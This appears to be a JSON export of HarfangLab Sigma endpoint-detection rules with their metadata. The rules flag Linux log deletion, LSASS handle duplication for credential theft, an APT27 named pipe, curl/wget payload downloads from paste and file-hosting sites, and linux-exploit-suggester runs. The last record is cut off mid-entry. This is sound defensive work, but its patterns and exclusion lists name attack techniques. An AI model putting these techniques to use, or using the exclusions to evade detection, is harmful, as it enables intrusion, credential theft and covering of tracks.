"content": "title: System Logs Removed via Command-line\nid: 249d762f-c5a2-406d-acf3-071a10d93210\ndescription: |\n Detects an attempt to remove any of the system's logs.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1070.002/\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/03\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_bin:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/shred'\n - '/truncate'\n ParentImage|contains: '?'\n\n selection_files:\n CommandLine|contains:\n - 'auth.log'\n - 'boot.log'\n - 'history.log'\n - 'cron.log'\n - 'dmesg'\n - 'dpkg.log'\n - 'kern.log'\n - 'messages'\n - 'secure'\n - 'syslog'\n - 'utmp'\n - 'wtmp'\n - 'journal'\n\n selection_command:\n CommandLine|contains:\n - '/var/log'\n - '/var/logs'\n - '/var/audit'\n - '/run/log/journal'\n\n selection_directory:\n CurrentDirectory|contains:\n - '/var/log/'\n - '/var/logs/'\n - '/var/audit/'\n - '/run/log/journal/'\n\n filter_slash:\n CommandLine|contains: ' /'\n\n exclusion_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_docker:\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/bin/docker-containerd-shim '\n - '/usr/bin/docker-containerd-shim-current '\n - '/usr/libexec/docker/docker-runc-current '\n - Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_debian_installer:\n - ParentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_savelog:\n CommandLine: 'rm -f -- /var/log//dmesg.? /var/log//dmesg.?.gz'\n ParentCommandLine|contains|all:\n - 'savelog'\n - '/var/log/dmesg'\n GrandparentImage|endswith: '/systemd'\n\n exclusion_genesys:\n CommandLine|contains: 'rm -f *.log.gz'\n ParentCommandLine|contains: '/opt/genesys/logcompress.sh'\n\n exclusion_apt:\n Image:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_pmlogger:\n - ParentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n - GrandparentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n\n exclusion_insights:\n CommandLine|contains: '/usr/bin/python /usr/bin/insights-client'\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/libexec/platform-python /bin/yum'\n\n exclusion_intertel:\n - ParentCommandLine|contains: '/opt/intertel/bin/findcore'\n - GrandparentCommandLine|contains: '/opt/intertel/bin/findcore'\n\n exclusion_mbgui:\n GrandparentCommandLine: 'runsv mbgui'\n\n exclusion_nagios_group:\n ProcessGroup: 'nagios'\n ProcessAncestors|contains:\n - '/crond|'\n - '/naemon|'\n\n exclusion_nagios:\n - ParentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - GrandparentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - ParentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n - GrandparentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n\n exclusion_popularity_contest:\n - ParentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n\n exclusion_moodle_sortlogs:\n ParentCommandLine: 'bash /usr/local/bin/moodle_sortlogs /var/log/moodle/cron /var/log/moodle'\n\n exclusion_pmcd:\n ParentCommandLine:\n - '/bin/sh /usr/libexec/pcp/lib/pmcd start-systemd'\n - '/bin/sh /usr/share/pcp/lib/pmcd start'\n\n exclusion_qradar:\n ParentCommandLine|contains:\n - '--login /opt/qradar/perf/systemStabMon -interval ??'\n - '/opt/qradar/bin/check_date_change.sh'\n\n exclusion_logrote:\n - ProcessParentImage: '/usr/sbin/logrotate'\n - ProcessAncestors|contains: '|/usr/sbin/logrotate|'\n\n exclusion_eset:\n ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_purge:\n ProcessImage:\n - '/bin/rm'\n - '/usr/bin/rm'\n ProcessParentImage:\n - '/bin/find'\n - '/usr/bin/find'\n ProcessParentCommandLine|contains|all:\n - ' -mtime '\n - ' -exec '\n\n condition: selection_bin and selection_files and (selection_command or (selection_directory and not filter_slash)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "249d762f-c5a2-406d-acf3-071a10d93210",
"rule_name": "System Logs Removed via Command-line",
"rule_description": "Detects an attempt to remove any of the system's logs.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24c0c873-a33d-4075-bcfe-ed95f209f435",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085199Z",
"creation_date": "2026-03-23T11:45:34.085201Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085206Z",
"rule_level": "critical",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://rastamouse.me/dumping-lsass-with-duplicated-handles/",
"https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication"
],
"name": "t1003_001_lsass_handle_duplicated.yml",
"content": "title: Lsass Handle with VM Read Granted Access Duplicated\nid: 24c0c873-a33d-4075-bcfe-ed95f209f435\ndescription: |\n Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\n The Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\n Handle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\n It is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\nreferences:\n - https://rastamouse.me/dumping-lsass-with-duplicated-handles/\n - https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication\ndate: 2025/04/29\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessDuplicateHandle\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_duplicate_handle\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n AgentVersion|gte|version: 4.9.0\n\n exclusion_csrss:\n CallerImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\csrss.exe'\n - '\\Device\\VhdHardDisk*\\Windows\\System32\\csrss.exe'\n CallerIsDestination: true\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_hp:\n CallerImage: '?:\\Program Files\\HP\\Sure Click\\bin\\Br-init-o.exe'\n ProcessSignature|contains: 'Bromium'\n ProcessSigned: 'true'\n\n exclusion_kaspersky:\n CallerImage|startswith: '?:\\Program Files (x86)\\Kaspersky Lab\\'\n ProcessSignature|contains: 'Kaspersky Lab'\n ProcessSigned: 'true'\n\n exclusion_nable:\n CallerImage|startswith: '?:\\Program Files (x86)\\N-able Technologies\\'\n ProcessSignature:\n - 'N-ABLE TECHNOLOGIES LTD'\n - 'Solarwinds Worldwide, LLC'\n ProcessSigned: 'true'\n\n exclusion_werfault:\n CallerImage|startswith:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\SysWOW64\\WerFaultSecure.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_werfault_commandline:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_windows_task_tools:\n CallerImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\System32\\taskkill.exe'\n - '?:\\Windows\\System32\\Taskmgr.exe.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sentinelone:\n CallerImage|startswith: '?:\\Program Files\\SentinelOne\\'\n ProcessSignature: 'Sentinelone, Inc.'\n ProcessSigned: 'true'\n\n exclusion_perfmon:\n CallerImage: '?:\\Windows\\System32\\perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_windows_cluster_binaries:\n ProcessOriginalFileName:\n - 'rhs.exe'\n - 'clussvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_checkpoint:\n CallerImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_dnspy:\n ProcessSha256:\n - '6674538f0c1bfb2b02921aebea81654dd196efbfe520c1c34d4872908a205a9d'\n - 'bc1c4e0fc49c138bbfc223d3e94231cd4884439c663646d91e48fa005df6704a'\n\n exclusion_pythonservice:\n ProcessSha256: '29a187322c91af564eb259b6b2834d0530d9c7bf0f7c7e42a1c911679cdb745e'\n\n # Covered by another specific rule\n exclusion_procdump:\n ProcessOriginalFileName:\n - 'procdump.exe'\n - 'procdump'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n # Covered by another specific rule\n exclusion_rdrleakdiag:\n CallerImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n exclusion_taskmgr:\n CallerImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_sccm:\n CallerImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_adobe:\n ProcessOriginalFileName: 'Creative Cloud.exe'\n ProcessSignature: 'Adobe Inc.'\n ProcessSigned: 'true'\n\n exclusion_elastic:\n CallerImage: '?:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe'\n ProcessSignature: 'Elasticsearch, Inc.'\n ProcessSigned: 'true'\n\n exclusion_internet_explorer:\n CallerImage: '?:\\Program Files\\Internet Explorer\\iexplore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_alibaba:\n CallerImage|startswith: '?:\\Program Files (x86)\\AlibabaProtect\\'\n ProcessSignature: 'ALIBABA (CHINA) NETWORK TECHNOLOGY CO.,LTD.'\n ProcessSigned: 'true'\n\n exclusion_mcafee:\n CallerImage|startswith: '?:\\Program Files\\McAfee\\'\n ProcessSignature|contains: 'McAfee, Inc.'\n ProcessSigned: 'true'\n\n exclusion_fsecure:\n CallerImage|startswith: '?:\\Program Files (x86)\\F-Secure\\'\n ProcessSignature|contains: 'WithSecure Oyj'\n ProcessSigned: 'true'\n\n exclusion_lsass:\n CallerImage|startswith: '?:\\Windows\\system32\\lsass.exe'\n ProcessSigned: 'true'\n\n exclusion_wsmprovhost_to_itself:\n CallerImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n SourceImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_powershell_to_itself:\n - CallerImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n SourceImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - CallerImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n SourceImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n\n exclusion_powertoys:\n ProcessOriginalFileName: 'PowerToys.FileLocksmithUI.dll'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_fileassassin:\n ProcessOriginalFileName: 'FileASSASSIN.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_setup:\n ProcessOriginalFileName: 'SetupHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n CallerImage: '?:\\Program Files (x86)\\Common Files\\Symantec Shared\\COH\\COH64.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_jetbrains:\n ProcessOriginalFileName: 'JetBrains.ReSharperUltimate.LightInstaller'\n ProcessSignature: 'JetBrains s.r.o.'\n ProcessSigned: 'true'\n\n exclusion_system_informer:\n ProcessOriginalFileName: 'System Informer.exe'\n ProcessSignature: 'Winsider Seminars & Solutions Inc.'\n ProcessSigned: 'true'\n\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24c0c873-a33d-4075-bcfe-ed95f209f435",
"rule_name": "Lsass Handle with VM Read Granted Access Duplicated",
"rule_description": "Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\nHandle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\nIt is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\n",
"rule_creation_date": "2025-04-29",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24ca43a5-7027-4676-8c7f-991dff78cc7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607956Z",
"creation_date": "2026-03-23T11:45:34.607971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_apt27_named_pipe_creation.yml",
"content": "title: Suspicious APT27 Related Named Pipe Created\nid: 24ca43a5-7027-4676-8c7f-991dff78cc7c\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24ca43a5-7027-4676-8c7f-991dff78cc7c",
"rule_name": "Suspicious APT27 Related Named Pipe Created",
"rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "250b3fce-b831-41da-8d48-7ece2c3de1e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599825Z",
"creation_date": "2026-03-23T11:45:34.599829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599836Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_linux.yml",
"content": "title: File Downloaded via curl or wget from Suspicious URL (Linux)\nid: 250b3fce-b831-41da-8d48-7ece2c3de1e0\ndescription: |\n Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/01/27\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Curl\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'artchive.org'\n - 'paste.c-net.org'\n\n # https://github.com/gianlucaborello/libprocesshider/archive/refs/heads/master.zip\n # https://github.com/gianlucaborello/libprocesshider/archive/25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip\n - 'https://github.com/*/archive/*.zip'\n\n exclusion_legitimate_url:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/Orange-Cyberdefense/*IOC'\n - ' https://raw.githubusercontent.com/google/'\n - ' https://raw.githubusercontent.com/Homebrew/'\n - ' https://raw.githubusercontent.com/wp-cli/'\n - ' https://raw.githubusercontent.com/nextcloud/'\n - ' https://raw.githubusercontent.com/laurent22/joplin/'\n - ' https://raw.githubusercontent.com/ohmyzsh/'\n - ' https://raw.githubusercontent.com/nvm-sh/'\n - ' https://raw.githubusercontent.com/docker-library/'\n - ' https://raw.githubusercontent.com/anchore/'\n - ' https://storage.googleapis.com/git-repo-downloads/'\n - ' https://github.com/scylladb/'\n - ' https://raw.githubusercontent.com/microsoft/'\n - ' https://raw.githubusercontent.com/community-scripts/ProxmoxVE/'\n - ' https://raw.githubusercontent.com/helm/'\n - ' https://raw.githubusercontent.com/pyenv/'\n - ' https://raw.githubusercontent.com/onyx-dot-app/'\n\n exclusion_commandline:\n CommandLine|contains: 'curl -vvv --max-time 0 --proxy * --proxy-user * -H Authorization: Bearer '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_netdata:\n - CommandLine|contains:\n - ' https://raw.githubusercontent.com/netdata/netdata/master/packaging/installer/'\n - ' https://storage.googleapis.com/netdata-nightlies/'\n - ParentCommandLine: 'bash /etc/cron.daily/netdata-updater'\n\n exclusion_clamav:\n ParentCommandLine: '/usr/bin/bash /usr/local/sbin/clamav-unofficial-sigs.sh'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "250b3fce-b831-41da-8d48-7ece2c3de1e0",
"rule_name": "File Downloaded via curl or wget from Suspicious URL (Linux)",
"rule_description": "Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2023-01-27",
"rule_modified_date": "2025-10-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "252c798b-019c-4d67-848f-3b675cd5c18f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613378Z",
"creation_date": "2026-03-23T11:45:34.613381Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613389Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mzet-/linux-exploit-suggester/",
"https://attack.mitre.org/techniques/T1595/002/"
],
"name": "t1595_002_linux_exp_suggester_bash.yml",
"content": "title: Linux-Exploit-Suggester Hacktool Executed via Bash\nid: 252c798b-019c-4d67-848f-3b675cd5c18f\ndescription: |\n Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\n Adversaries may use this script to identify a way to elevate their privileges.\n It is recommended to check for other suspicious activities by the process' parent.\nreferences:\n - https://github.com/mzet-/linux-exploit-suggester/\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Bash\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_script:\n CommandLine|contains: 'linux-exploit-suggester.sh'\n filter_script:\n ParentCommandLine|contains: 'linux-exploit-suggester.sh'\n\n selection_cmd:\n CommandLine:\n - \"grep -E -i ^networkmanager-vpnc|network-manager-vpnc-[0-9]+\"\n - \"grep -E -i ^polkit|policykit-1-[0-9]+\"\n\n condition: (selection_script and not filter_script) or selection_cmd\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "252c798b-019c-4d67-848f-3b675cd5c18f",
"rule_name": "Linux-Exploit-Suggester Hacktool Executed via Bash",
"rule_description": "Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\nAdversaries may use this script to identify a way to elevate their privileges.\nIt is recommended to check for other suspicious activities by the process' parent.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "254f2253-5e75-41de-a4fb-bbfa86c1a831",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604309Z",
"creation_date": "2026-03-23T11:45:34.604312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604320Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/valak-evolution/",
"https://twitter.com/ForensicITGuy/status/1334734244120309760",
"https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/"
],
